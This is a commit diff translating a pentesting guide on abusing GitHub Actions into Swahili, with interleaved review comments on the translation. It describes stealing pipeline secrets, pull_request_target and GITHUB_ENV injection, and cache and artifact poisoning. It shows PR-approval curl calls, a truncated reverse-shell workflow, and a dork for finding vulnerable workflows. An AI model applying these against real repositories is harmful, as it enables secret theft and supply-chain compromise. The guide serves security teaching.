mirror of
https://github.com/HackTricks-wiki/hacktricks-cloud.git
synced 2026-02-04 11:07:37 -08:00
Translated ['src/banners/hacktricks-training.md', 'src/pentesting-ci-cd/
@@ -4,45 +4,45 @@
|
||||
|
||||
## Basic Information
|
||||
|
||||
In this page you will find:
|
||||
Katika ukurasa huu utaona:
|
||||
|
||||
- A **summary of all the impacts** of an attacker managing to access a Github Action
|
||||
- Different ways to **get access to an action**:
|
||||
- Having **permissions** to create the action
|
||||
- Abusing **pull request** related triggers
|
||||
- Abusing **other external access** techniques
|
||||
- **Pivoting** from an already compromised repo
|
||||
- Finally, a section about **post-exploitation techniques to abuse an action from inside** (cause the mentioned impacts)
|
||||
- **Muhtasari wa athari zote** za mshambuliaji kufanikiwa kupata ufikiaji wa Github Action
|
||||
- Njia tofauti za **kupata ufikiaji wa hatua**:
|
||||
- Kuwa na **idhini** za kuunda hatua hiyo
|
||||
- Kutumia **vichocheo** vinavyohusiana na ombi la kuvuta
|
||||
- Kutumia **mbinu nyingine za ufikiaji wa nje**
|
||||
- **Pivoting** kutoka kwenye repo iliyoshambuliwa tayari
|
||||
- Hatimaye, sehemu kuhusu **mbinu za baada ya unyakuzi kutumia hatua kutoka ndani** (kwa sababu ya athari zilizotajwa)
|
||||
|
||||
## Impacts Summary
|
||||
|
||||
For an introduction about [**Github Actions check the basic information**](../basic-github-information.md#github-actions).
|
||||
Kwa utangulizi kuhusu [**Github Actions angalia taarifa za msingi**](../basic-github-information.md#github-actions).
|
||||
|
||||
If you can **execute arbitrary code in GitHub Actions** within a **repository**, you may be able to:
|
||||
Ikiwa unaweza **kutekeleza msimbo wowote katika GitHub Actions** ndani ya **repo**, unaweza kuwa na uwezo wa:
|
||||
|
||||
- **Steal secrets** mounted to the pipeline and **abuse the pipeline's privileges** to gain unauthorized access to external platforms, such as AWS and GCP.
|
||||
- **Compromise deployments** and other **artifacts**.
|
||||
- If the pipeline deploys or stores assets, you could alter the final product, enabling a supply chain attack.
|
||||
- **Execute code in custom workers** to abuse computing power and pivot to other systems.
|
||||
- **Overwrite repository code**, depending on the permissions associated with the `GITHUB_TOKEN`.
|
||||
- **Kuhujumu siri** zilizowekwa kwenye pipeline na **kutumia mamlaka ya pipeline** kupata ufikiaji usioidhinishwa kwenye majukwaa ya nje, kama AWS na GCP.
|
||||
- **Kuhujumu matumizi** na **vitu vingine**.
|
||||
- Ikiwa pipeline inapeleka au kuhifadhi mali, unaweza kubadilisha bidhaa ya mwisho, kuwezesha shambulio la mnyororo wa usambazaji.
|
||||
- **Kutekeleza msimbo katika wafanyakazi maalum** ili kutumia nguvu za kompyuta na pivot kwa mifumo mingine.
|
||||
- **Kufuta msimbo wa repo**, kulingana na ruhusa zinazohusiana na `GITHUB_TOKEN`.
|
||||
|
||||
## GITHUB_TOKEN
|
||||
|
||||
This "**secret**" (coming from `${{ secrets.GITHUB_TOKEN }}` and `${{ github.token }}`) is given when the admin enables this option:
|
||||
Hii "**siri**" (inayotoka `${{ secrets.GITHUB_TOKEN }}` na `${{ github.token }}`) inatolewa wakati msimamizi anapowezesha chaguo hili:
|
||||
|
||||
<figure><img src="../../../images/image (86).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
This token is the same one a **Github Application will use**, so it can access the same endpoints: [https://docs.github.com/en/rest/overview/endpoints-available-for-github-apps](https://docs.github.com/en/rest/overview/endpoints-available-for-github-apps)
|
||||
Token hii ni sawa na ile ambayo **Github Application itatumia**, hivyo inaweza kufikia mwisho sawa: [https://docs.github.com/en/rest/overview/endpoints-available-for-github-apps](https://docs.github.com/en/rest/overview/endpoints-available-for-github-apps)
|
||||
|
||||
> [!WARNING]
|
||||
> Github should release a [**flow**](https://github.com/github/roadmap/issues/74) that **allows cross-repository** access within GitHub, so a repo can access other internal repos using the `GITHUB_TOKEN`.
|
||||
> Github inapaswa kutoa [**mchakato**](https://github.com/github/roadmap/issues/74) ambao **unaruhusu ufikiaji wa kuvuka-repo** ndani ya GitHub, ili repo iweze kufikia repo nyingine za ndani kwa kutumia `GITHUB_TOKEN`.
|
||||
|
||||
You can see the possible **permissions** of this token in: [https://docs.github.com/en/actions/security-guides/automatic-token-authentication#permissions-for-the-github_token](https://docs.github.com/en/actions/security-guides/automatic-token-authentication#permissions-for-the-github_token)
|
||||
Unaweza kuona **idhini** zinazowezekana za token hii katika: [https://docs.github.com/en/actions/security-guides/automatic-token-authentication#permissions-for-the-github_token](https://docs.github.com/en/actions/security-guides/automatic-token-authentication#permissions-for-the-github_token)
|
||||
|
||||
Note that the token **expires after the job has completed**.\
|
||||
These tokens looks like this: `ghs_veaxARUji7EXszBMbhkr4Nz2dYz0sqkeiur7`
|
||||
Kumbuka kwamba token **inaisha muda baada ya kazi kukamilika**.\
|
||||
Token hizi zinaonekana kama hii: `ghs_veaxARUji7EXszBMbhkr4Nz2dYz0sqkeiur7`
|
||||
|
||||
Some interesting things you can do with this token:
|
||||
Mambo kadhaa ya kuvutia unayoweza kufanya na token hii:
|
||||
|
||||
{{#tabs }}
|
||||
{{#tab name="Merge PR" }}
|
||||
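Review bot: in the Impacts Summary list, the added bullet "**Kufuta msimbo wa repo**" reads as "delete the repository code", while the line it replaces says "Overwrite repository code"; something like "Kuandika juu ya msimbo wa repo" keeps the meaning. In the same list "Steal secrets" and "Compromise deployments" are both rendered with "Kuhujumu", so two distinct impacts collapse into one verb; a later hunk of this page already uses "kuiba siri" for stealing secrets, which would fit the first bullet.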
@@ -67,7 +67,7 @@ https://api.github.com/repos/<org_name>/<repo_name>/pulls/<pr_number>/reviews \
|
||||
-d '{"event":"APPROVE"}'
|
||||
```
|
||||
{{#endtab }}
|
||||
{{#tab name="Unda PR" }}
|
||||
{{#tab name="Create PR" }}
|
||||
```bash
|
||||
# Create a PR
|
||||
curl -X POST \
|
||||
@@ -111,7 +111,7 @@ secret_postgress_pass: ${{secrets.POSTGRESS_PASSWORDyaml}}
|
||||
|
||||
<details>
|
||||
|
||||
<summary>Pata shell ya kinyume na siri</summary>
|
||||
<summary>Pata shell ya kurudi na siri</summary>
|
||||
```yaml
|
||||
name: revshell
|
||||
on:
|
||||
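Review bot: the context carried in this hunk header reads `secret_postgress_pass: ${{secrets.POSTGRESS_PASSWORDyaml}}`, which looks like a code-fence language tag fused onto the secret name in the translated file. Since this commit already touches the block directly below it, check the fence around that example and restore the expression; the same context appears again in the @@ -425 hunk.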
@@ -141,19 +141,19 @@ Inawezekana kuangalia ruhusa zilizotolewa kwa Github Token katika hifadhi za wat
|
||||
## Utekelezaji Ulioidhinishwa
|
||||
|
||||
> [!NOTE]
|
||||
> Hii ingekuwa njia rahisi zaidi ya kuathiri vitendo vya Github, kwani kesi hii inadhani kuwa una uf access **kuunda hifadhi mpya katika shirika**, au una **haki za kuandika juu ya hifadhi**.
|
||||
> Hii ingekuwa njia rahisi zaidi ya kuathiri vitendo vya Github, kwani kesi hii inadhani kuwa una ufikiaji wa **kuunda hifadhi mpya katika shirika**, au una **haki za kuandika juu ya hifadhi**.
|
||||
>
|
||||
> Ikiwa uko katika hali hii unaweza tu kuangalia [Mbinu za Baada ya Utekelezaji](./#post-exploitation-techniques-from-inside-an-action).
|
||||
> Ikiwa uko katika hali hii unaweza tu kuangalia [Post Exploitation techniques](./#post-exploitation-techniques-from-inside-an-action).
|
||||
|
||||
### Utekelezaji Kutoka kwa Uundaji wa Hifadhi
|
||||
### Utekelezaji kutoka kwa Uundaji wa Hifadhi
|
||||
|
||||
Katika kesi ambapo wanachama wa shirika wanaweza **kuunda hifadhi mpya** na unaweza kutekeleza vitendo vya github, unaweza **kuunda hifadhi mpya na kuiba siri zilizowekwa katika kiwango cha shirika**.
|
||||
|
||||
### Utekelezaji Kutoka kwa Tawi Jipya
|
||||
### Utekelezaji kutoka kwa Tawi Jipya
|
||||
|
||||
Ikiwa unaweza **kuunda tawi jipya katika hifadhi ambayo tayari ina Github Action** iliyowekwa, unaweza **kubadilisha** hiyo, **kupakia** maudhui, na kisha **kutekeleza kitendo hicho kutoka kwa tawi jipya**. Kwa njia hii unaweza **kuondoa siri za hifadhi na kiwango cha shirika** (lakini unahitaji kujua zinaitwaje).
|
||||
|
||||
Unaweza kufanya kitendo kilichobadilishwa kiwe cha kutekelezeka **kwa mikono,** wakati **PR inaundwa** au wakati **kodi fulani inasukumwa** (kulingana na jinsi unavyotaka kuwa na sauti):
|
||||
Unaweza kufanya kitendo kilichobadilishwa kiwe cha kutekelezeka **kwa mikono,** wakati **PR inaundwa** au wakati **kodi fulani inasukumwa** (kulingana na jinsi unavyotaka kuwa na kelele):
|
||||
```yaml
|
||||
on:
|
||||
workflow_dispatch: # Launch manually
|
||||
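Review bot: the link changed in the NOTE block still points at `./#post-exploitation-techniques-from-inside-an-action`, a fragment derived from the English heading. The translated heading is "Baada ya Utekelezaji kutoka kwa Hatua" (edited in the @@ -376 hunk) and carries no explicit id, so the fragment probably no longer resolves. Either give that heading an explicit `<a id=...>` the way "Kufikia siri" has one, or update the fragment here.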
@@ -174,18 +174,18 @@ branches:
|
||||
|
||||
### `pull_request`
|
||||
|
||||
Vichocheo vya kazi **`pull_request`** vitatekeleza kazi kila wakati ombi la kuvuta linapopokelewa na baadhi ya visingizio: kwa kawaida ikiwa ni **mara ya kwanza** unapo **shirikiana**, baadhi ya **wasimamizi** watahitaji **kuthibitisha** **kuendesha** kazi hiyo:
|
||||
Vichocheo vya workflow **`pull_request`** vitatekeleza workflow kila wakati ombi la kuvuta linapopokelewa na baadhi ya visingizio: kwa kawaida ikiwa ni **mara ya kwanza** unapo **shirikiana**, baadhi ya **wasimamizi** watahitaji **kuthibitisha** **kuendesha** workflow:
|
||||
|
||||
<figure><img src="../../../images/image (184).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
> [!NOTE]
|
||||
> Kwa kuwa **kikomo cha kawaida** ni kwa **watoaji wa mara ya kwanza**, unaweza kuchangia **kurekebisha hitilafu/typo halali** na kisha kutuma **PR nyingine ili kutumia haki zako mpya za `pull_request`**.
|
||||
> Kwa kuwa **kikomo cha kawaida** ni kwa **watoaji wa mara ya kwanza**, unaweza kuchangia **kurekebisha hitilafu halali/typo** na kisha kutuma **PR nyingine ili kutumia haki zako mpya za `pull_request`**.
|
||||
>
|
||||
> **Nilijaribu hii na haifanyi kazi**: ~~Chaguo lingine lingekuwa kuunda akaunti kwa jina la mtu ambaye alichangia kwenye mradi na kufuta akaunti yake.~~
|
||||
> **Nimejaribu hii na haifanyi kazi**: ~~Chaguo lingine lingekuwa kuunda akaunti kwa jina la mtu ambaye alichangia kwenye mradi na kufuta akaunti yake.~~
|
||||
|
||||
Zaidi ya hayo, kwa kawaida **inazuia ruhusa za kuandika** na **ufikiaji wa siri** kwa hifadhi lengwa kama ilivyoelezwa katika [**nyaraka**](https://docs.github.com/en/actions/using-workflows/events-that-trigger-workflows#workflows-in-forked-repositories):
|
||||
Zaidi ya hayo, kwa kawaida **inazuia ruhusa za kuandika** na **ufikiaji wa siri** kwa hifadhi lengwa kama ilivyoelezwa katika [**docs**](https://docs.github.com/en/actions/using-workflows/events-that-trigger-workflows#workflows-in-forked-repositories):
|
||||
|
||||
> Kwa kutengwa kwa `GITHUB_TOKEN`, **siri hazipitishwi kwa mchezaji** wakati kazi inachochewa kutoka hifadhi **forked**. **`GITHUB_TOKEN` ina ruhusa za kusoma tu** katika ombi la kuvuta **kutoka hifadhi za forked**.
|
||||
> Kwa kutengwa kwa `GITHUB_TOKEN`, **siri hazipitishwi kwa mchezaji** wakati workflow inachochewa kutoka hifadhi **forked**. **`GITHUB_TOKEN` ina ruhusa za kusoma tu** katika maombi ya kuvuta **kutoka hifadhi za forked**.
|
||||
|
||||
Mshambuliaji anaweza kubadilisha ufafanuzi wa Github Action ili kutekeleza mambo yasiyo na mipaka na kuongeza vitendo vya kiholela. Hata hivyo, hataweza kuiba siri au kufuta repo kwa sababu ya vikwazo vilivyotajwa.
|
||||
|
||||
@@ -196,20 +196,20 @@ Kwa kuwa mshambuliaji pia anadhibiti msimbo unaotekelezwa, hata kama hakuna siri
|
||||
|
||||
### **`pull_request_target`**
|
||||
|
||||
Vichocheo vya kazi **`pull_request_target`** vina **ruhusa za kuandika** kwa hifadhi lengwa na **ufikiaji wa siri** (na havihitaji ruhusa).
|
||||
Vichocheo vya workflow **`pull_request_target`** vina **ruhusa za kuandika** kwa hifadhi lengwa na **ufikiaji wa siri** (na havihitaji ruhusa).
|
||||
|
||||
Kumbuka kwamba vichocheo vya kazi **`pull_request_target`** **vinakimbia katika muktadha wa msingi** na si katika ile iliyotolewa na PR (ili **kutoendesha msimbo usioaminika**). Kwa maelezo zaidi kuhusu `pull_request_target` [**angalia nyaraka**](https://docs.github.com/en/actions/using-workflows/events-that-trigger-workflows#pull_request_target).\
|
||||
Zaidi ya hayo, kwa maelezo zaidi kuhusu matumizi haya hatari maalum angalia hii [**blogu ya github**](https://securitylab.github.com/research/github-actions-preventing-pwn-requests/).
|
||||
Kumbuka kwamba vichocheo vya workflow **`pull_request_target`** **vinakimbia katika muktadha wa msingi** na si katika ule unaotolewa na PR (ili **kutoendesha msimbo usioaminika**). Kwa maelezo zaidi kuhusu `pull_request_target` [**angalia docs**](https://docs.github.com/en/actions/using-workflows/events-that-trigger-workflows#pull_request_target).\
|
||||
Zaidi ya hayo, kwa maelezo zaidi kuhusu matumizi haya hatari maalum angalia [**blogu ya github**](https://securitylab.github.com/research/github-actions-preventing-pwn-requests/).
|
||||
|
||||
Inaweza kuonekana kuwa kwa sababu **kazi inayotekelezwa** ni ile iliyofafanuliwa katika **msingi** na **siyo katika PR** ni **salama** kutumia **`pull_request_target`**, lakini kuna **mifano michache ambapo si salama**.
|
||||
Inaweza kuonekana kuwa kwa sababu **workflow inayotekelezwa** ni ile iliyoainishwa katika **msingi** na **siyo katika PR** ni **salama** kutumia **`pull_request_target`**, lakini kuna **mambo machache ambapo si salama**.
|
||||
|
||||
Na hii itakuwa na **ufikiaji wa siri**.
|
||||
|
||||
### `workflow_run`
|
||||
|
||||
Vichocheo vya [**workflow_run**](https://docs.github.com/en/actions/using-workflows/events-that-trigger-workflows#workflow_run) vinaruhusu kuendesha kazi kutoka nyingine wakati imekamilika, imeombwa au inaendelea.
|
||||
Vichocheo vya [**workflow_run**](https://docs.github.com/en/actions/using-workflows/events-that-trigger-workflows#workflow_run) vinaruhusu kuendesha workflow kutoka nyingine wakati imekamilika, imeombwa au inaendelea.
|
||||
|
||||
Katika mfano huu, kazi imewekwa ili kuendesha baada ya kazi tofauti "Run Tests" kukamilika:
|
||||
Katika mfano huu, workflow imepangwa kuendesha baada ya workflow tofauti "Run Tests" kukamilika:
|
||||
```yaml
|
||||
on:
|
||||
workflow_run:
|
||||
@@ -217,31 +217,31 @@ workflows: [Run Tests]
|
||||
types:
|
||||
- completed
|
||||
```
|
||||
Moreover, according to the docs: The workflow started by the `workflow_run` event is able to **access secrets and write tokens, even if the previous workflow was not**.
|
||||
Zaidi ya hayo, kulingana na nyaraka: Mchakato ulioanzishwa na tukio la `workflow_run` unaweza **kupata siri na kuandika tokeni, hata kama mchakato wa awali haukuwa**.
|
||||
|
||||
This kind of workflow could be attacked if it's **depending** on a **workflow** that can be **triggered** by an external user via **`pull_request`** or **`pull_request_target`**. A couple of vulnerable examples can be [**found this blog**](https://www.legitsecurity.com/blog/github-privilege-escalation-vulnerability)**.** The first one consist on the **`workflow_run`** triggered workflow downloading out the attackers code: `${{ github.event.pull_request.head.sha }}`\
|
||||
The second one consist on **passing** an **artifact** from the **untrusted** code to the **`workflow_run`** workflow and using the content of this artifact in a way that makes it **vulnerable to RCE**.
|
||||
Aina hii ya mchakato inaweza kushambuliwa ikiwa inategemea **mchakato** ambao unaweza **kuanzishwa** na mtumiaji wa nje kupitia **`pull_request`** au **`pull_request_target`**. Mifano kadhaa za hatari zinaweza [**kupatikana kwenye blogu hii**](https://www.legitsecurity.com/blog/github-privilege-escalation-vulnerability)**.** Ya kwanza inahusisha **`workflow_run`** iliyoanzishwa ikipakua msimbo wa washambuliaji: `${{ github.event.pull_request.head.sha }}`\
|
||||
Ya pili inahusisha **kupitisha** **artifact** kutoka kwa msimbo **usioaminika** hadi kwenye mchakato wa **`workflow_run`** na kutumia maudhui ya artifact hii kwa njia inayofanya iwe **hatari kwa RCE**.
|
||||
|
||||
### `workflow_call`
|
||||
|
||||
TODO
|
||||
|
||||
TODO: Check if when executed from a pull_request the used/downloaded code if the one from the origin or from the forked PR
|
||||
TODO: Angalia ikiwa wakati inatekelezwa kutoka kwa pull_request msimbo ulio tumika/pakuliwa ni ule kutoka kwa asili au kutoka kwa PR iliyofanywa.
|
||||
|
||||
## Abusing Forked Execution
|
||||
## Kutumia Utekelezaji wa Forked
|
||||
|
||||
We have mentioned all the ways an external attacker could manage to make a github workflow to execute, now let's take a look about how this executions, if bad configured, could be abused:
|
||||
Tumetaja njia zote ambazo mshambuliaji wa nje anaweza kuweza kufanya mchakato wa github kutekelezwa, sasa hebu tuangalie jinsi utekelezaji huu, ikiwa umewekwa vibaya, unaweza kutumiwa vibaya:
|
||||
|
||||
### Untrusted checkout execution
|
||||
### Utekelezaji wa untrusted checkout
|
||||
|
||||
In the case of **`pull_request`,** the workflow is going to be executed in the **context of the PR** (so it'll execute the **malicious PRs code**), but someone needs to **authorize it first** and it will run with some [limitations](./#pull_request).
|
||||
Katika kesi ya **`pull_request`,** mchakato utaanzishwa katika **muktadha wa PR** (hivyo utaanzisha **msimbo wa PR mbaya**), lakini mtu anahitaji **kuidhinisha kwanza** na utaendesha kwa baadhi ya [mipaka](./#pull_request).
|
||||
|
||||
In case of a workflow using **`pull_request_target` or `workflow_run`** that depends on a workflow that can be triggered from **`pull_request_target` or `pull_request`** the code from the original repo will be executed, so the **attacker cannot control the executed code**.
|
||||
Katika kesi ya mchakato unaotumia **`pull_request_target` au `workflow_run`** inayotegemea mchakato ambao unaweza kuanzishwa kutoka **`pull_request_target` au `pull_request`** msimbo kutoka kwa repo ya asili utaanzishwa, hivyo **mshambuliaji hawezi kudhibiti msimbo unaotekelezwa**.
|
||||
|
||||
> [!CAUTION]
|
||||
> However, if the **action** has an **explicit PR checkou**t that will **get the code from the PR** (and not from base), it will use the attackers controlled code. For example (check line 12 where the PR code is downloaded):
|
||||
> Hata hivyo, ikiwa **action** ina **ukaguzi wa PR wazi** ambao uta **pata msimbo kutoka kwa PR** (na sio kutoka msingi), itatumia msimbo ulio chini ya udhibiti wa mshambuliaji. Kwa mfano (angalia mstari wa 12 ambapo msimbo wa PR unapakuliwa):
|
||||
|
||||
<pre class="language-yaml"><code class="lang-yaml"># INSECURE. Provided as an example only.
|
||||
<pre class="language-yaml"><code class="lang-yaml"># INSECURE. Imepewa kama mfano tu.
|
||||
on:
|
||||
pull_request_target
|
||||
|
||||
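Review bot: the added lines here render "workflow" as "mchakato" (for example "Mchakato ulioanzishwa na tukio la `workflow_run`"), while the @@ -174 and @@ -196 hunks of this same commit replace the translated "kazi" with the untranslated "workflow". Use "workflow" here too so the prose matches the trigger names it discusses. In the CAUTION block, "explicit PR checkout" becomes "ukaguzi wa PR wazi", which reads as an inspection rather than a git checkout; the heading above keeps "untrusted checkout", so keep "checkout" in the body as well.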
@@ -269,14 +269,14 @@ message: |
|
||||
Thank you!
|
||||
</code></pre>
|
||||
|
||||
The potentially **untrusted code is being run during `npm install` or `npm build`** as the build scripts and referenced **packages are controlled by the author of the PR**.
|
||||
Msimbo unaoweza kuwa **usioaminika unatekelezwa wakati wa `npm install` au `npm build`** kwani skripti za kujenga na **pakiti** zinazohusishwa zinadhibitiwa na mwandishi wa PR.
|
||||
|
||||
> [!WARNING]
|
||||
> A github dork to search for vulnerable actions is: `event.pull_request pull_request_target extension:yml` however, there are different ways to configure the jobs to be executed securely even if the action is configured insecurely (like using conditionals about who is the actor generating the PR).
|
||||
> Dork ya github kutafuta vitendo vyenye hatari ni: `event.pull_request pull_request_target extension:yml` hata hivyo, kuna njia tofauti za kuweka kazi zinazoweza kutekelezwa kwa usalama hata kama action imewekwa kwa njia isiyo salama (kama kutumia masharti kuhusu nani ni mchezaji anayezalisha PR).
|
||||
|
||||
### Context Script Injections <a href="#understanding-the-risk-of-script-injections" id="understanding-the-risk-of-script-injections"></a>
|
||||
### Makinikia ya Muktadha wa Script <a href="#understanding-the-risk-of-script-injections" id="understanding-the-risk-of-script-injections"></a>
|
||||
|
||||
Note that there are certain [**github contexts**](https://docs.github.com/en/actions/reference/context-and-expression-syntax-for-github-actions#github-context) whose values are **controlled** by the **user** creating the PR. If the github action is using that **data to execute anything**, it could lead to **arbitrary code execution:**
|
||||
Kumbuka kuwa kuna baadhi ya [**muktadha ya github**](https://docs.github.com/en/actions/reference/context-and-expression-syntax-for-github-actions#github-context) ambao thamani zao zina **dhibitiwa** na **mtumiaji** anayezalisha PR. Ikiwa action ya github inatumia hiyo **data kutekeleza chochote**, inaweza kusababisha **utekelezaji wa msimbo wa kiholela:**
|
||||
|
||||
{{#ref}}
|
||||
gh-actions-context-script-injections.md
|
||||
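Review bot: in the WARNING block, "who is the actor generating the PR" is translated as "nani ni mchezaji anayezalisha PR"; "mchezaji" means player, which hides that the mitigation being described is a conditional on the workflow's actor. Keep "actor" untranslated so a reader can map the sentence to the value they would actually test.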
@@ -284,23 +284,23 @@ gh-actions-context-script-injections.md
|
||||
|
||||
### **GITHUB_ENV Script Injection** <a href="#what-is-usdgithub_env" id="what-is-usdgithub_env"></a>
|
||||
|
||||
From the docs: You can make an **environment variable available to any subsequent steps** in a workflow job by defining or updating the environment variable and writing this to the **`GITHUB_ENV`** environment file.
|
||||
Kutoka kwenye nyaraka: Unaweza kufanya **kigezo cha mazingira kiweze kupatikana kwa hatua zozote zinazofuata** katika kazi ya mchakato kwa kufafanua au kuboresha kigezo cha mazingira na kuandika hii kwenye faili ya mazingira ya **`GITHUB_ENV`**.
|
||||
|
||||
If an attacker could **inject any value** inside this **env** variable, he could inject env variables that could execute code in following steps such as **LD_PRELOAD** or **NODE_OPTIONS**.
|
||||
Ikiwa mshambuliaji anaweza **kuchanganya thamani yoyote** ndani ya hii **env** kigezo, anaweza kuchanganya vigezo vya env ambavyo vinaweza kutekeleza msimbo katika hatua zinazofuata kama **LD_PRELOAD** au **NODE_OPTIONS**.
|
||||
|
||||
For example ([**this**](https://www.legitsecurity.com/blog/github-privilege-escalation-vulnerability-0) and [**this**](https://www.legitsecurity.com/blog/-how-we-found-another-github-action-environment-injection-vulnerability-in-a-google-project)), imagine a workflow that is trusting an uploaded artifact to store its content inside **`GITHUB_ENV`** env variable. An attacker could upload something like this to compromise it:
|
||||
Kwa mfano ([**hii**](https://www.legitsecurity.com/blog/github-privilege-escalation-vulnerability-0) na [**hii**](https://www.legitsecurity.com/blog/-how-we-found-another-github-action-environment-injection-vulnerability-in-a-google-project)), fikiria mchakato ambao unategemea artifact iliyopakiwa kuhifadhi maudhui yake ndani ya **`GITHUB_ENV`** kigezo. Mshambuliaji anaweza kupakia kitu kama hiki ili kukiharibu:
|
||||
|
||||
<figure><img src="../../../images/image (261).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
### Vulnerable Third Party Github Actions
|
||||
### Vitendo vya Github vya Tatu vya Hatari
|
||||
|
||||
#### [dawidd6/action-download-artifact](https://github.com/dawidd6/action-download-artifact)
|
||||
|
||||
As mentioned in [**this blog post**](https://www.legitsecurity.com/blog/github-actions-that-open-the-door-to-cicd-pipeline-attacks), this Github Action allows to access artifacts from different workflows and even repositories.
|
||||
Kama ilivyotajwa katika [**hiki kipande cha blogu**](https://www.legitsecurity.com/blog/github-actions-that-open-the-door-to-cicd-pipeline-attacks), hii Github Action inaruhusu kufikia artifacts kutoka kwa michakato tofauti na hata hifadhi.
|
||||
|
||||
The thing problem is that if the **`path`** parameter isn't set, the artifact is extracted in the current directory and it can override files that could be later used or even executed in the workflow. Therefore, if the Artifact is vulnerable, an attacker could abuse this to compromise other workflows trusting the Artifact.
|
||||
Tatizo kubwa ni kwamba ikiwa **`path`** parameter haijawekwa, artifact inachukuliwa katika saraka ya sasa na inaweza kubadilisha faili ambazo zinaweza kutumika baadaye au hata kutekelezwa katika mchakato. Kwa hivyo, ikiwa Artifact ina hatari, mshambuliaji anaweza kutumia hii kuathiri michakato mingine inayotegemea Artifact.
|
||||
|
||||
Example of vulnerable workflow:
|
||||
Mfano wa mchakato wa hatari:
|
||||
```yaml
|
||||
on:
|
||||
workflow_run:
|
||||
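Review bot: "inject" is translated as "kuchanganya" (to mix) in the GITHUB_ENV paragraph ("anaweza **kuchanganya thamani yoyote**"), yet the @@ -392 hunk of this commit replaces "unachanganya" with "unachoma" for the same English word. Pick one rendering for injection and apply it in both places, otherwise the section title and the body of the GITHUB_ENV section no longer describe the same attack class to the reader.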
@@ -340,27 +340,27 @@ path: ./script.py
|
||||
```
|
||||
---
|
||||
|
||||
## Mtu Mwingine wa Nje
|
||||
## Mipango Mingine ya Nje
|
||||
|
||||
### Utekaji wa Repo ya Namespace Iliyofutwa
|
||||
### Utekwaji wa Repo ya Namespace Iliyofutwa
|
||||
|
||||
Ikiwa akaunti inabadilisha jina lake, mtumiaji mwingine anaweza kujiandikisha na akaunti yenye jina hilo baada ya muda fulani. Ikiwa repo ilikuwa na **nyota chini ya 100 kabla ya kubadilisha jina**, Github itaruhusu mtumiaji mpya aliyejiandikisha kwa jina hilo kuunda **repo yenye jina sawa** na ile iliyofutwa.
|
||||
Ikiwa akaunti inabadilisha jina lake, mtumiaji mwingine anaweza kujiandikisha na akaunti yenye jina hilo baada ya muda fulani. Ikiwa hazina ilikuwa na **nyota chini ya 100 kabla ya kubadilisha jina**, Github itaruhusu mtumiaji mpya aliyejiandikisha kwa jina hilo kuunda **hazina yenye jina sawa** na ile iliyofutwa.
|
||||
|
||||
> [!CAUTION]
|
||||
> Hivyo basi ikiwa hatua inatumia repo kutoka kwa akaunti isiyokuwepo, bado inawezekana kwamba mshambuliaji anaweza kuunda akaunti hiyo na kuathiri hatua hiyo.
|
||||
> Hivyo basi ikiwa hatua inatumia hazina kutoka kwa akaunti isiyokuwepo, bado inawezekana kwamba mshambuliaji anaweza kuunda akaunti hiyo na kuathiri hatua hiyo.
|
||||
|
||||
Ikiwa repo nyingine zilikuwa zikitumika **kutegemea kutoka kwa repo za mtumiaji huyu**, mshambuliaji ataweza kuzikamata. Hapa kuna maelezo kamili zaidi: [https://blog.nietaanraken.nl/posts/gitub-popular-repository-namespace-retirement-bypass/](https://blog.nietaanraken.nl/posts/gitub-popular-repository-namespace-retirement-bypass/)
|
||||
Ikiwa hazina nyingine zilikuwa zikitumika **kutegemea kutoka kwa hazina za mtumiaji huyu**, mshambuliaji ataweza kuziiba. Hapa kuna maelezo kamili zaidi: [https://blog.nietaanraken.nl/posts/gitub-popular-repository-namespace-retirement-bypass/](https://blog.nietaanraken.nl/posts/gitub-popular-repository-namespace-retirement-bypass/)
|
||||
|
||||
---
|
||||
|
||||
## Uhamasishaji wa Repo
|
||||
## Mabadiliko ya Repo
|
||||
|
||||
> [!NOTE]
|
||||
> Katika sehemu hii tutazungumzia mbinu ambazo zitaruhusu **kuhamasisha kutoka repo moja hadi nyingine** tukidhani tuna aina fulani ya ufikiaji kwenye ya kwanza (angalia sehemu iliyopita).
|
||||
|
||||
### Upoison wa Cache
|
||||
|
||||
Cache inatunzwa kati ya **mizunguko ya workflow katika tawi moja**. Hii ina maana kwamba ikiwa mshambuliaji **anaathiri** **kifurushi** ambacho kisha kinahifadhiwa kwenye cache na **kupakuliwa** na kutekelezwa na **workflow yenye mamlaka zaidi**, ataweza pia **kuathiri** workflow hiyo.
|
||||
Cache inashikiliwa kati ya **mizunguko ya workflow katika tawi moja**. Hii ina maana kwamba ikiwa mshambuliaji **ataathiri** **pakiti** ambayo kisha inahifadhiwa kwenye cache na **kupakuliwa** na kutekelezwa na **workflow yenye mamlaka zaidi**, ataweza pia **kuathiri** workflow hiyo.
|
||||
|
||||
{{#ref}}
|
||||
gh-actions-cache-poisoning.md
|
||||
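Review bot: the replacements in the namespace section switch "repo" to "hazina", but the headings in this same hunk keep "Repo" ("Utekwaji wa Repo ya Namespace Iliyofutwa", "Mabadiliko ya Repo") and the @@ -141 hunk uses "hifadhi" for repository. That leaves three terms for one concept on a single page; settle on one (keeping "repo" matches the headings and the untouched NOTE line) and apply it consistently.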
@@ -368,7 +368,7 @@ gh-actions-cache-poisoning.md
|
||||
|
||||
### Upoison wa Kazi
|
||||
|
||||
Workflows zinaweza kutumia **kazi kutoka kwa workflows nyingine na hata repos**, ikiwa mshambuliaji anafanikiwa **kuathiri** Github Action inayopakia **kazi** ambayo baadaye inatumika na workflow nyingine, anaweza **kuathiri workflows nyingine**:
|
||||
Workflows zinaweza kutumia **kazi kutoka kwa workflows nyingine na hata hazina**, ikiwa mshambuliaji anafanikiwa **kuathiri** Github Action inay **pakia kazi** ambayo baadaye inatumika na workflow nyingine, anaweza **kuathiri workflows nyingine**:
|
||||
|
||||
{{#ref}}
|
||||
gh-actions-artifact-poisoning.md
|
||||
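Review bot: the added line splits a word around the bold markers: "Github Action inay **pakia kazi**" leaves the fragment "inay" on its own, where the replaced line had "inayopakia **kazi**". Restore the whole word outside or inside the emphasis. The section also uses "kazi" for artifacts while the linked page is gh-actions-artifact-poisoning.md and the `workflow_run` section keeps "artifact" untranslated; using "artifact" here would avoid the clash with "kazi" as job/workflow.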
@@ -376,7 +376,7 @@ gh-actions-artifact-poisoning.md
|
||||
|
||||
---
|
||||
|
||||
## Baada ya Kutekeleza kutoka kwa Hatua
|
||||
## Baada ya Utekelezaji kutoka kwa Hatua
|
||||
|
||||
### Kufikia AWS na GCP kupitia OIDC
|
||||
|
||||
